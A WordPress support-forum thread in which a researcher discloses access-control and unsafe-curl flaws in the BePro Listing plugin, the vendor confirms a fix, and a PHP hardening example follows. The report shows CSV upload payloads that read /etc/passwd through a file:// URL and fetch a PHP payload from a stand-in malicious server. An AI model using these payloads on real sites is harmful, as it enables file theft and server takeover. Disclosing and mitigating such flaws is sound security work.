Tagged: curl, executable, fget, security
This topic has 1 reply, 2 voices, and was last updated 4 years, 4 months ago by BePro Software Team.
December 31, 2020 at 1:28 pm #12098 turecek (Member)

As discussed in our email communications, I am posting my findings pertaining to a potential security vulnerability within this plugin.
Please note, I have included several images which I am not able to import into this post. I have included a link to the document where I have recorded my work: https://drive.google.com/file/d/1M7SSE3C_38p60j8DYyI8bxETG3BUYj30/view?usp=sharing
Access Control Issues and Unsafe Usage of Curl

While reviewing the BePro Listing WordPress plugin, I was able to identify several issues which could have a critical impact on the WordPress server the plugin is installed on. This issue appears to stem from poor access control rules that allow unauthenticated users to change the BePro Listing options. While the ability for an unauthenticated user to change the plugin options is problematic, it is not a critical vulnerability. The critical vulnerability exists in how the plugin handles the CSV file uploads. The CSV upload mechanism allows the user to upload images of listings, by leveraging the “curl” command. However, the system leverages this function in an unsafe manner. This allows unauthenticated users the ability to read local files, as well as upload malicious files.

Access Control Issues
When an administrator attempts to update the BePro Listing options, a POST request is sent to the following URL, “edit.php?post_type=bepro_listings&page=bepro_listings_options.” Unfortunately, the processing of the POST request data does not appear to consider the current user’s access levels.

This was verified by removing all cookies from the POST request sent when an admin updated the options. Normally, the system will receive the packet, and leveraging the cookie data, verify the current user. Unfortunately, when replaying this request with no cookies, a request that should not be processed, the plugin did process the request.

This issue appears tied to how the BePro Listing plugin initiates itself when called. When constructed, the plugin adds an “init” action which calls “bepro_create_post_type().” Eventually, this function will call the “permalink_save_options()” which edits the plugin’s options. None of these functions perform any checks to verify that the current session has the acceptable permissions.

Unsafe curl Usage
When an administrative user attempts to change the plugin’s options, a POST request containing multipart form data is sent. The contents of this form data are reviewed and processed by various files and functions within the plugin.

However, when processing CSV file uploads, which appear as below, the system does not handle the “photo” field in a safe manner.
Content-Disposition: form-data; name="csv_upload"; filename="csv_upload_example.csv"
Content-Type: text/csv

item_name,content,categories,first_name,last_name,cost,email,website,address_line1,postcode,city,state,country,phone,lat,lon,photo
Test listing, just a simple test, 1, john, tester, 500, [email protected], test_site, 220 e university blvd, 32901, melbourne, fl, usa, 5554443333,,,http://example.com
When processing the uploaded CSV file, the bepro_listings_admin.php file will call the function “permalink_save_options().” Within this function, the system will parse the various options provided. When it encounters the CSV data, it will loop through the file to save various pieces of information. However, when it comes to the “photo” field, the below code is executed.

As long as a URL is present, the system will call the function “bl_attach_remote_file()” which is found in “bepro_listings_functions.php.”

Assuming a photo is present, the system processes the input and calls the function “bl_http_get_file()” shown below. This function is where the vulnerability lies.

To download the file, the curl command is leveraged in most cases, as the “map_query_type” is set to curl by default. When the curl function executes it will attempt to download the requested file present at the “remote_url” variable. However, the remote_url variable is never sanitized. This means that a user can leverage an arbitrary protocol and access arbitrary data on the system. Currently, most versions of curl support the following protocols – dict, file, ftp, ftps, gopher, http, https, imap, imaps, ldap, ldaps, pop3, pop3s, rtmp, rtsp, smb, smbs, smtp, smtps, telnet, tftp.
Leveraging a protocol such as “file”, for example, could allow an arbitrary user to access local files on the system. To do this, a user would only need to change the CSV POST data to the following.
Content-Disposition: form-data; name="csv_upload"; filename="csv_upload_example.csv"
Content-Type: text/csv

item_name,content,categories,first_name,last_name,cost,email,website,address_line1,postcode,city,state,country,phone,lat,lon,photo
Test listing, just a simple test, 1, john, tester, 500, [email protected], test_site, 220 e university blvd, 32901, melbourne, fl, usa, 5554443333,,,file:///etc/passwd
Upon execution, this would place the contents of the passwd file within the uploads directory with a file name of passwd. A malicious user could then leverage this data to support various attacks.

Additionally, more serious attacks can occur. It is possible for a threat actor to upload an arbitrary PHP file onto the server using various methods.

To achieve this a threat actor would only need to configure an HTTP server to return all files as text content. From there they could create a malicious file with the PHP extension. When the server requested this file, it would receive back the contents of the file in a text format, but process it as a PHP file on its own system. A threat actor could use this to execute arbitrary code on the server. The below payload, with the properly configured server, could achieve such an attack. (In this example, the payload.php file would contain the attacker’s malicious code.)
Content-Disposition: form-data; name="csv_upload"; filename="csv_upload_example.csv"
Content-Type: text/csv

item_name,content,categories,first_name,last_name,cost,email,website,address_line1,postcode,city,state,country,phone,lat,lon,photo
Test listing, just a simple test, 1, john, tester, 500, [email protected], test_site, 220 e university blvd, 32901, melbourne, fl, usa, 5554443333,,,http://malicious.server/payload.php
Threat actors could likely execute similar attacks by abusing the FTP protocol.

To mitigate this issue, several steps should occur. First, the remote_url variable should be sanitized. This sanitization process would include denying any non-HTTP URLs. Given the use case, I do not believe users will require any protocol outside of HTTP and HTTPS. Support for additional protocols could create potential security issues.

Additionally, prior to storing any user supplied files on the server, the system should verify that they are in fact image files. This verification should look at both the file name, and file content. WordPress provides multiple functions to help with safe file uploads. However, I am not sure how these would interface with the curl command.

December 31, 2020 at 1:30 pm #12106 BePro Software Team (Keymaster)

Hi,
Thanks for sharing this. The issues mentioned are all fixed in version 3.1.0004. Thanks
___
BePro Software Team
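The two mitigations the report above asks for (deny non-HTTP URLs before curl runs, and check the fetched content before writing it to the uploads directory), together with the missing capability check, written out as an added PHP example. This is not the plugin's code and not the fix shipped in 3.1.0004; the function names `example_is_http_url` and `example_attach_remote_image` are hypothetical, and the capability name `manage_options` is an assumption about what the options page should require. The WordPress and PHP functions it calls (`wp_parse_url`, `current_user_can`, `wp_unique_filename`, `wp_generate_password`, `WP_Error`, the curl and `finfo` extensions) are real.

```php
<?php
// Added example, not BePro Listing's own code: a hardened "fetch a remote photo
// with curl and store it in uploads" routine. Function names are hypothetical.

// Return true only for absolute http/https URLs. file://, ftp://, gopher://,
// dict:// and scheme-less or host-less values are rejected before curl sees them.
function example_is_http_url( $url ) {
    $parts = wp_parse_url( $url );
    if ( ! is_array( $parts ) || empty( $parts['scheme'] ) || empty( $parts['host'] ) ) {
        return false;
    }
    return in_array( strtolower( $parts['scheme'] ), array( 'http', 'https' ), true );
}

// Download a remote image and store it under $dest_dir with a server-chosen name.
// Returns the stored path, or a WP_Error explaining why the file was refused.
function example_attach_remote_image( $remote_url, $dest_dir ) {
    // 1. Access control: the request must come from a user allowed to edit options
    //    (assumed capability), so an unauthenticated replay is rejected outright.
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'forbidden', 'Insufficient permissions.' );
    }

    // 2. Scheme allow-list on the user-supplied value from the CSV "photo" column.
    if ( ! example_is_http_url( $remote_url ) ) {
        return new WP_Error( 'bad_url', 'Only http and https URLs are accepted.' );
    }

    // 3. Make curl itself refuse every other protocol, including after a redirect,
    //    so a 302 pointing at a file:// or ftp:// URL is not followed.
    $ch = curl_init( $remote_url );
    curl_setopt_array( $ch, array(
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_FOLLOWLOCATION  => true,
        CURLOPT_MAXREDIRS       => 3,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 20,
    ) );
    $body   = curl_exec( $ch );
    $status = curl_getinfo( $ch, CURLINFO_HTTP_CODE );
    $error  = curl_error( $ch );
    curl_close( $ch );
    if ( false === $body || '' !== $error || 200 !== $status ) {
        return new WP_Error( 'fetch_failed', 'Remote fetch failed: ' . $error );
    }

    // 4. Content check: decide the type from the bytes, not from the URL's extension
    //    or the remote Content-Type header. A PHP script served as text fails here.
    $allowed = array( 'image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif' );
    $finfo   = new finfo( FILEINFO_MIME_TYPE );
    $mime    = $finfo->buffer( $body );
    if ( ! isset( $allowed[ $mime ] ) ) {
        return new WP_Error( 'not_an_image', 'Fetched content is not an allowed image type.' );
    }

    // 5. File name check: never reuse the remote name (e.g. "payload.php" or "passwd");
    //    build one from a random stem and the extension implied by the sniffed content.
    $dest_dir = trailingslashit( $dest_dir );
    $name     = wp_unique_filename( $dest_dir, wp_generate_password( 16, false ) . '.' . $allowed[ $mime ] );
    if ( false === file_put_contents( $dest_dir . $name, $body ) ) {
        return new WP_Error( 'write_failed', 'Could not store the image.' );
    }
    return $dest_dir . $name;
}
```

Two notes on the design. The handler that processes the options POST should also call `check_admin_referer()` on the form's nonce before any of this runs, which closes the cookie-less replay described in the report at the request level rather than only at the download step. And where a plugin can drop curl, WordPress core's `wp_safe_remote_get()` is the idiomatic replacement: it only speaks HTTP(S) and additionally refuses loopback and private-network hosts, which a scheme allow-list alone does not cover.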